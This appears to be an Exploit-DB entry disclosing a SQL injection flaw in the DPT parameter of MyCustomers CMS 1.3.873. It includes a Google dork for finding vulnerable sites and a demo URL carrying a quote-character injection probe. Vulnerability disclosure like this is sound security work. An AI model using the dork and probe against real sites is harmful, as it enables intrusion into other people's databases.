MyCustomers CMS 1.3.873 - SQL Injection

Author: Persian Hack Team
type: webapps
platform: php
port: 80.0
date_added: 2015-11-30 
date_updated: 2015-12-04 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-11-30-at-224114.png 
application_url: http://www.exploit-db.comMC1.3.873.zip

######################
# Exploit Title : MyCustomers Cms Sql Injection Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.iran-php.com/
# Google Dork : "Powered By IranPHP" & inurl:/index.php?DPT=IP17 & "Powered+by+MyCustomers-1.3.873"
# Date: 2015/11/28
# Version :  1.3
#
######################
# Vulnerable Paramter DPT=
# Demo:
# http://server/index.php?DPT=IP17%27
#
# Youtube : https://www.youtube.com/watch?v=43DVOq5L2hw
#
# We reported to vendor but Anyone not responsive
# It's not joke
# We do not take responsibility
#
######################
# Discovered by :
# Mojtaba MobhaM & T3NZOG4N (t3nz0g4n@yahoo.com)
######################